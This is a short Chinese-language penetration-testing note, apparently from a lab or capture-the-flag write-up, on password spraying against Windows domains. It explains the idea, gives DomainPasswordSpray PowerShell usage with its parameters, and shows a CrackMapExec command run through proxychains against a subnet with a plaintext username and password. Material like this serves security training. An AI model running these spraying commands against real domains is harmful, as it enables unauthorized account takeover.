密码喷洒 (Password Spraying)
在常规的爆破中,我们都是先用很多密码去碰撞一个账号,这样很容易导致账号被锁定。而密码喷洒就是先用一个密码去碰撞很多账号,此方法能有效的避免账号被锁定的问题
DomainPasswordSpray 是用 PowerShell 编写的工具,用于对域用户执行密码喷洒攻击。默认情况下,它将利用 LDAP 从域中导出用户列表,然后扣掉被锁定的用户,再用固定密码进行密码喷洒
1
2
| Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password <密码>
|
参数:
1
2
3
4
5
6
7
8
| Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
UserList - 可选的 UserList 参数。如果未指定,则会自动生成。
Password - 将使用一个密码来执行密码喷洒。
PasswordList - 每行一个密码列表,用于密码喷洒(要非常小心,不要锁定帐户)。
OutFile - 输出结果的文件。
Domain - 一个可以喷洒的域。
Force - 强制继续喷涂而不提示确认。
|
或者可以利用kali中的CrackMapExec(CME)来进行喷洒密码
1
| proxychains4 crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null
|
